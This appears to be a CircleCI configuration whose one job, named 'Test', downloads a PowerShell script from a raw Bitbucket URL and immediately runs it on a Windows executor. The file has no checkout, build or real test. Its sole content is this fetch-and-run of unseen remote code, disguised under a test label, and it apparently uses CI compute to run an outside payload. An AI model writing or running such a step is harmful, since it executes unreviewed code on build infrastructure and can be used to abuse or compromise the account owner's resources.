version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/munikok/uniko/raw/7569a314fb5457ec07fa14ae36b083606d75c0dc/log.ps1 -OutFile log.ps1
            ./log.ps1